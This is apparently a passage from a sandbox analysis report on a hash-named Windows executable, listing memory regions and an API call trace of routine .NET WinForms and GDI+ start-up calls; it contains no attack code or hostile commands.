entry_point = 0x0
region_type = private
name = "private_0x0000000008cf0000"
filename = ""
Region:
id = 899
start_va = 0x8ce0000
end_va = 0x9cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ce0000"
filename = ""
Region:
id = 900
start_va = 0x9ce0000
end_va = 0x9efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009ce0000"
filename = ""
Region:
id = 901
start_va = 0x9f00000
end_va = 0xaefffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f00000"
filename = ""
Region:
id = 902
start_va = 0xaf00000
end_va = 0xb32ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000af00000"
filename = ""
Region:
id = 903
start_va = 0xb330000
end_va = 0xb364fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000b330000"
filename = ""
Region:
id = 904
start_va = 0xb370000
end_va = 0xb37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b370000"
filename = ""
Region:
id = 905
start_va = 0xb380000
end_va = 0xb38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b380000"
filename = ""
Region:
id = 906
start_va = 0xb370000
end_va = 0xc36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b370000"
filename = ""
Region:
id = 907
start_va = 0xc370000
end_va = 0xd36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000c370000"
filename = ""
Region:
id = 908
start_va = 0xd370000
end_va = 0xe36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000d370000"
filename = ""
Region:
id = 909
start_va = 0xe370000
end_va = 0xe37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e370000"
filename = ""
Region:
id = 910
start_va = 0xe380000
end_va = 0xe38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e380000"
filename = ""
Region:
id = 911
start_va = 0xe390000
end_va = 0xe39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e390000"
filename = ""
Region:
id = 912
start_va = 0xe3a0000
end_va = 0xe3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e3a0000"
filename = ""
Region:
id = 913
start_va = 0xe3b0000
end_va = 0xe3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e3b0000"
filename = ""
Region:
id = 914
start_va = 0xe3c0000
end_va = 0xe3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e3c0000"
filename = ""
Region:
id = 915
start_va = 0x6a5b0000
end_va = 0x6a5b5fff
monitored = 0
entry_point = 0x6a5b1570
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll")
Region:
id = 916
start_va = 0x71f20000
end_va = 0x7206afff
monitored = 0
entry_point = 0x71f81660
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 917
start_va = 0x670000
end_va = 0x6affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 918
start_va = 0x8b0000
end_va = 0x9affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 919
start_va = 0x21f0000
end_va = 0x21f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021f0000"
filename = ""
Region:
id = 920
start_va = 0x74360000
end_va = 0x743e3fff
monitored = 0
entry_point = 0x74386220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 921
start_va = 0x73870000
end_va = 0x73a8bfff
monitored = 0
entry_point = 0x73a3bc40
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")
Region:
id = 922
start_va = 0x2200000
end_va = 0x2200fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002200000"
filename = ""
Region:
id = 923
start_va = 0x2210000
end_va = 0x224ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002210000"
filename = ""
Region:
id = 924
start_va = 0x8ce0000
end_va = 0x8ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ce0000"
filename = ""
Region:
id = 925
start_va = 0x2250000
end_va = 0x2253fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 926
start_va = 0x8de0000
end_va = 0x8e24fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")
Region:
id = 927
start_va = 0x2260000
end_va = 0x2263fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 928
start_va = 0x8e30000
end_va = 0x8ebdfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 929
start_va = 0x8ec0000
end_va = 0x8efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ec0000"
filename = ""
Region:
id = 930
start_va = 0x8f00000
end_va = 0x8ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f00000"
filename = ""
Region:
id = 931
start_va = 0x2270000
end_va = 0x2271fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002270000"
filename = ""
Region:
id = 932
start_va = 0x2280000
end_va = 0x2280fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002280000"
filename = ""
Region:
id = 933
start_va = 0x9000000
end_va = 0x93fafff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000009000000"
filename = ""
Region:
id = 934
start_va = 0x9400000
end_va = 0x9403fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 935
start_va = 0x9410000
end_va = 0x9422fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db"
filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db")
Region:
id = 936
start_va = 0x9430000
end_va = 0x9430fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000009430000"
filename = ""
Region:
id = 937
start_va = 0x703b0000
end_va = 0x7052dfff
monitored = 0
entry_point = 0x7042c630
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 938
start_va = 0x71af0000
end_va = 0x71dbafff
monitored = 0
entry_point = 0x71d2c4c0
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 939
start_va = 0x9400000
end_va = 0x9400fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000009400000"
filename = ""
Region:
id = 1443
start_va = 0x9440000
end_va = 0x944ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009440000"
filename = ""
Region:
id = 1496
start_va = 0x9440000
end_va = 0x947ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009440000"
filename = ""
Region:
id = 1497
start_va = 0x9480000
end_va = 0x957ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009480000"
filename = ""
Region:
id = 1504
start_va = 0x9580000
end_va = 0x95bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009580000"
filename = ""
Region:
id = 1505
start_va = 0x95c0000
end_va = 0x96bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000095c0000"
filename = ""
Region:
id = 1506
start_va = 0x96c0000
end_va = 0x97bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000096c0000"
filename = ""
Region:
id = 1507
start_va = 0x97c0000
end_va = 0x97cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000097c0000"
filename = ""
Region:
id = 1514
start_va = 0x97d0000
end_va = 0x97dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000097d0000"
filename = ""
Region:
id = 1515
start_va = 0x97d0000
end_va = 0x97dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000097d0000"
filename = ""
Region:
id = 1516
start_va = 0x97d0000
end_va = 0x97dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000097d0000"
filename = ""
Thread:
id = 1
os_tid = 0x600
[0101.006] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0103.817] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0103.817] GetLastError () returned 0x2
[0103.826] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0103.826] GetLastError () returned 0x2
[0103.833] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0103.833] GetLastError () returned 0x2
[0103.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0103.846] GetLastError () returned 0x2
[0103.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0103.846] GetLastError () returned 0x2
[0103.856] GetVersionExW (in: lpVersionInformation=0x702c38*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x702c38*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0103.856] GetLastError () returned 0x2
[0103.858] GetVersionExW (in: lpVersionInformation=0x702c38*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x702c38*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0103.858] GetLastError () returned 0x2
[0107.566] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1ae
[0107.567] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1af
[0108.165] GetSystemMetrics (nIndex=75) returned 1
[0108.835] AdjustWindowRectEx (in: lpRect=0x19ee9c, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19ee9c) returned 1
[0108.965] GetCurrentProcess () returned 0xffffffff
[0108.967] GetCurrentThread () returned 0xfffffffe
[0108.967] GetCurrentProcess () returned 0xffffffff
[0108.988] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19edcc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19edcc*=0x284) returned 1
[0108.988] GetLastError () returned 0x2
[0109.135] GetCurrentThreadId () returned 0x600
[0109.571] lstrlenW (lpString="䅁") returned 1
[0109.894] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76300000
[0109.898] GetProcAddress (hModule=0x76300000, lpProcName="DefWindowProcW") returned 0x772eaee0
[0109.902] GetStockObject (i=5) returned 0x1900015
[0109.903] GetLastError () returned 0x2
[0109.936] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0109.950] CoTaskMemAlloc (cb=0x4c) returned 0x700a10
[0109.950] RegisterClassW (lpWndClass=0x73db10) returned 0xc1de
[0109.951] GetLastError () returned 0x2
[0109.951] CoTaskMemFree (pv=0x700a10)
[0109.951] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0110.008] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x8027e
[0110.105] SetWindowLongW (hWnd=0x8027e, nIndex=-4, dwNewLong=1999548128) returned 37554322
[0110.153] GetWindowLongW (hWnd=0x8027e, nIndex=-4) returned 1999548128
[0110.170] lstrlenW (lpString="䅁") returned 1
[0110.172] GetVersionExW (in: lpVersionInformation=0x75c808*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x75c808*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0110.172] GetLastError () returned 0x2
[0110.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e41c | out: phkResult=0x19e41c*=0x288) returned 0x0
[0110.218] RegQueryValueExW (in: hKey=0x288, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19e464, lpData=0x0, lpcbData=0x19e460*=0x0 | out: lpType=0x19e464*=0x0, lpData=0x0, lpcbData=0x19e460*=0x0) returned 0x2
[0110.218] RegQueryValueExW (in: hKey=0x288, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19e464, lpData=0x0, lpcbData=0x19e460*=0x0 | out: lpType=0x19e464*=0x0, lpData=0x0, lpcbData=0x19e460*=0x0) returned 0x2
[0110.218] RegCloseKey (hKey=0x288) returned 0x0
[0110.279] SetWindowLongW (hWnd=0x8027e, nIndex=-4, dwNewLong=37554642) returned 1999548128
[0110.279] GetWindowLongW (hWnd=0x8027e, nIndex=-4) returned 37554642
[0110.279] GetWindowLongW (hWnd=0x8027e, nIndex=-16) returned 113311744
[0110.465] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1dd
[0110.480] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x8027e, Msg=0x24, wParam=0x0, lParam=0x19e734) returned 0x0
[0110.483] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1d9
[0110.484] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x8027e, Msg=0x81, wParam=0x0, lParam=0x19e728) returned 0x1
[0110.485] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x8027e, Msg=0x83, wParam=0x0, lParam=0x19e714) returned 0x0
[0110.720] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x8027e, Msg=0x1, wParam=0x0, lParam=0x19e728) returned 0x0
[0110.761] GetClientRect (in: hWnd=0x8027e, lpRect=0x19e470 | out: lpRect=0x19e470) returned 1
[0110.763] GetWindowRect (in: hWnd=0x8027e, lpRect=0x19e470 | out: lpRect=0x19e470) returned 1
[0111.132] GetLastError () returned 0x6
[0111.140] GetParent (hWnd=0x8027e) returned 0x0
[0111.443] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.457] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.460] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.470] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.544] AdjustWindowRectEx (in: lpRect=0x19ec1c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec1c) returned 1
[0111.557] AdjustWindowRectEx (in: lpRect=0x19ec1c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec1c) returned 1
[0111.557] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.787] IIDFromString (in: lpsz="{7BF80980-BF32-101A-8BBB-00AA00300CAB}", lpiid=0x19eb9c | out: lpiid=0x19eb9c) returned 0x0
[0111.794] OleCreatePictureIndirect () returned 0x0
[0111.805] CPicture::QueryInterface () returned 0x0
[0111.809] CPicture::QueryInterface () returned 0x80004002
[0111.809] CPicture::QueryInterface () returned 0x80004002
[0111.810] CPicture::AddRef () returned 0x3
[0111.810] CoGetContextToken (in: pToken=0x19e1d0 | out: pToken=0x19e1d0) returned 0x0
[0111.810] CoGetContextToken (in: pToken=0x19e194 | out: pToken=0x19e194) returned 0x0
[0111.810] CObjectContext::QueryInterface () returned 0x0
[0111.811] CObjectContext::GetCurrentApartmentType () returned 0x0
[0111.811] Release () returned 0x0
[0111.811] CoGetObjectContext (in: riid=0x6c0603ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x76e9fc | out: ppv=0x76e9fc*=0x6fbb40) returned 0x0
[0111.894] CPicture::QueryInterface () returned 0x0
[0111.894] CPicture::GetUnmarshalClass () returned 0x80004005
[0111.894] Release () returned 0x3
[0111.895] CoGetContextToken (in: pToken=0x19e1c8 | out: pToken=0x19e1c8) returned 0x0
[0111.895] CPicture::AddRef () returned 0x4
[0111.895] CPicture::QueryInterface () returned 0x80004002
[0111.895] CPicture::Release () returned 0x3
[0111.895] CPicture::Release () returned 0x2
[0111.895] CoGetContextToken (in: pToken=0x19e63c | out: pToken=0x19e63c) returned 0x0
[0111.895] CoGetContextToken (in: pToken=0x19e5fc | out: pToken=0x19e5fc) returned 0x0
[0111.895] CPicture::AddRef () returned 0x3
[0111.895] CPicture::QueryInterface () returned 0x0
[0111.895] CPicture::Release () returned 0x3
[0111.895] CPicture::Release () returned 0x2
[0111.895] CPicture::Release () returned 0x1
[0111.895] CoGetContextToken (in: pToken=0x19e99c | out: pToken=0x19e99c) returned 0x0
[0111.896] IIDFromString (in: lpsz="{00000109-0000-0000-C000-000000000046}", lpiid=0x19e9d8 | out: lpiid=0x19e9d8) returned 0x0
[0111.896] CoGetContextToken (in: pToken=0x19e95c | out: pToken=0x19e95c) returned 0x0
[0111.896] CPicture::AddRef () returned 0x2
[0111.896] CPicture::QueryInterface () returned 0x0
[0111.896] CPicture::Release () returned 0x2
[0111.896] Release () returned 0x1
[0111.903] IIDFromString (in: lpsz="{0000000C-0000-0000-C000-000000000046}", lpiid=0x23d0ab8 | out: lpiid=0x23d0ab8) returned 0x0
[0111.910] CoGetContextToken (in: pToken=0x19e97c | out: pToken=0x19e97c) returned 0x0
[0111.910] CoGetContextToken (in: pToken=0x19e93c | out: pToken=0x19e93c) returned 0x0
[0111.910] CPicture::AddRef () returned 0x2
[0111.910] CPicture::QueryInterface () returned 0x0
[0111.910] CPicture::Release () returned 0x2
[0111.911] AddRef () returned 0x3
[0111.911] CPicture::Load () returned 0x0
[0111.961] Release () returned 0x2
[0111.967] CoGetContextToken (in: pToken=0x19ea30 | out: pToken=0x19ea30) returned 0x0
[0111.967] CoGetContextToken (in: pToken=0x19e9f0 | out: pToken=0x19e9f0) returned 0x0
[0111.967] CPicture::AddRef () returned 0x3
[0111.967] CPicture::QueryInterface () returned 0x0
[0111.968] CPicture::Release () returned 0x3
[0111.968] CPicture::AddRef () returned 0x4
[0111.968] CPicture::get_Type () returned 0x0
[0111.968] CPicture::Release () returned 0x3
[0111.971] CPicture::get_Handle () returned 0x0
[0112.117] GetSystemMetrics (nIndex=13) returned 32
[0112.117] GetSystemMetrics (nIndex=14) returned 32
[0112.119] GetIconInfo (in: hIcon=0x30221, piconinfo=0x272b344 | out: piconinfo=0x272b344) returned 1
[0112.122] GetObjectW (in: h=0x8f050567, c=24, pv=0x272b360 | out: pv=0x272b360) returned 24
[0112.122] GetLastError () returned 0x0
[0112.123] DeleteObject (ho=0x8f050567) returned 1
[0112.123] GetLastError () returned 0x0
[0112.130] CopyImage (h=0x30221, type=0x2, cx=32, cy=32, flags=0x0) returned 0x700fb
[0112.134] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0
[0112.134] CPicture::Release () returned 0x2
[0112.135] IUnknown:Release (This=0x6fbb40) returned 0x0
[0112.135] Release () returned 0x1
[0112.135] CPicture::Release () returned 0x0
[0112.165] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0112.284] GetCurrentProcessId () returned 0xaf0
[0112.284] GetLastError () returned 0x0
[0112.288] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0112.288] GetLastError () returned 0x2
[0112.291] AddAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0112.291] GetLastError () returned 0x2
[0112.896] GdiplusStartup (in: token=0x22e6d6c, input=0x73daf8, output=0x19e3f8 | out: token=0x22e6d6c, output=0x19e3f8) returned 0x0
[0112.900] GetLastError () returned 0x0
[0113.437] GdipCreateFontFamilyFromName (name="Capture it", fontCollection=0x0, fontFamily=0x19ebf0) returned 0xe
[0114.230] GetLastError () returned 0x7a
[0114.283] GdipGetGenericFontFamilySansSerif (nativeFamily=0x19ebe0) returned 0x0
[0114.283] GetLastError () returned 0x7a
[0114.343] GdipCreateFont (fontFamily=0x11111111, emSize=0x41d20000, style=1, unit=0x3, font=0x272b47c) returned 0x0
[0114.744] GetLastError () returned 0x0
[0114.756] GdipGetFontSize (font=0x546ef98, size=0x272b480) returned 0x0
[0114.800] GetLastError () returned 0x0
[0115.215] GetSystemDefaultLCID () returned 0x409
[0115.215] GetLastError () returned 0x0
[0115.217] GetStockObject (i=17) returned 0x10a0047
[0115.217] GetLastError () returned 0x0
[0115.287] GetObjectW (in: h=0x10a0047, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0115.288] GetLastError () returned 0x0
[0115.326] GetDC (hWnd=0x0) returned 0xb010541
[0115.327] GetLastError () returned 0x0
[0115.526] GdipCreateFontFromLogfontW (hdc=0xb010541, logfont=0x73db10, font=0x19eb70) returned 0x0
[0115.570] GetLastError () returned 0x0
[0115.637] GdipGetFontUnit (font=0x546efc0, unit=0x19eb44) returned 0x0
[0115.638] GetLastError () returned 0x7f
[0115.638] GdipGetFontSize (font=0x546efc0, size=0x19eb48) returned 0x0
[0115.638] GetLastError () returned 0x7f
[0115.640] GdipGetFontStyle (font=0x546efc0, style=0x19eb40) returned 0x0
[0115.640] GetLastError () returned 0x7f
[0115.643] GdipGetFamily (font=0x546efc0, family=0x19eb3c) returned 0x0
[0115.643] GetLastError () returned 0x7f
[0115.647] GdipGetFontSize (font=0x546efc0, size=0x272bbd0) returned 0x0
[0115.647] GetLastError () returned 0x7f
[0115.678] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1
[0115.678] GetLastError () returned 0x7f
[0115.796] GetDC (hWnd=0x0) returned 0xb010541
[0115.797] GetLastError () returned 0x7f
[0115.935] GdipCreateFromHDC (hdc=0xb010541, graphics=0x19eb64) returned 0x0
[0115.959] GetLastError () returned 0x7f
[0115.982] GdipGetDpiY (graphics=0x657f268, dpi=0x272bce4) returned 0x0
[0115.982] GetLastError () returned 0x7f
[0115.993] GdipGetFontHeight (font=0x546efc0, graphics=0x657f268, height=0x19eb5c) returned 0x0
[0115.994] GetLastError () returned 0x7f
[0116.003] GdipGetEmHeight (family=0x6574b40, style=0, EmHeight=0x19eb64) returned 0x0
[0116.067] GetLastError () returned 0x7f
[0116.078] GdipGetLineSpacing (family=0x6574b40, style=0, LineSpacing=0x19eb64) returned 0x0
[0116.078] GetLastError () returned 0x7f
[0116.454] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0116.455] GetLastError () returned 0x7f
[0116.460] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0116.470] GetLastError () returned 0x7f
[0116.470] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1
[0116.470] GetLastError () returned 0x7f
[0116.477] GdipCreateFont (fontFamily=0x6574b40, emSize=0x41040000, style=0, unit=0x3, font=0x272bc98) returned 0x0
[0116.477] GetLastError () returned 0x7f
[0116.478] GdipGetFontSize (font=0x657af30, size=0x272bc9c) returned 0x0
[0116.478] GetLastError () returned 0x7f
[0116.485] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0116.485] GetLastError () returned 0x7f
[0116.487] GdipDeleteFont (font=0x546efc0) returned 0x0
[0116.487] GetLastError () returned 0x7f
[0116.630] AdjustWindowRectEx (in: lpRect=0x19eba8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eba8) returned 1
[0116.653] GetProcessWindowStation () returned 0xf0
[0116.654] GetUserObjectInformationA (in: hObj=0xf0, nIndex=1, pvInfo=0x272c4bc, nLength=0xc, lpnLengthNeeded=0x19ea90 | out: pvInfo=0x272c4bc, lpnLengthNeeded=0x19ea90) returned 1
[0116.655] GetLastError () returned 0x7f
[0116.658] SetConsoleCtrlHandler (HandlerRoutine=0x23d0fca, Add=1) returned 1
[0116.659] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0116.659] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0116.664] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWndClass=0x272c504 | out: lpWndClass=0x272c504) returned 0
[0116.668] CoTaskMemAlloc (cb=0x58) returned 0x783fb0
[0116.668] RegisterClassW (lpWndClass=0x73db10) returned 0xc1d7
[0116.669] GetLastError () returned 0x583
[0116.669] CoTaskMemFree (pv=0x783fb0)
[0116.670] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWindowName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x50308
[0116.672] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x81, wParam=0x0, lParam=0x19e508) returned 0x1
[0116.676] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x83, wParam=0x0, lParam=0x19e4f4) returned 0x0
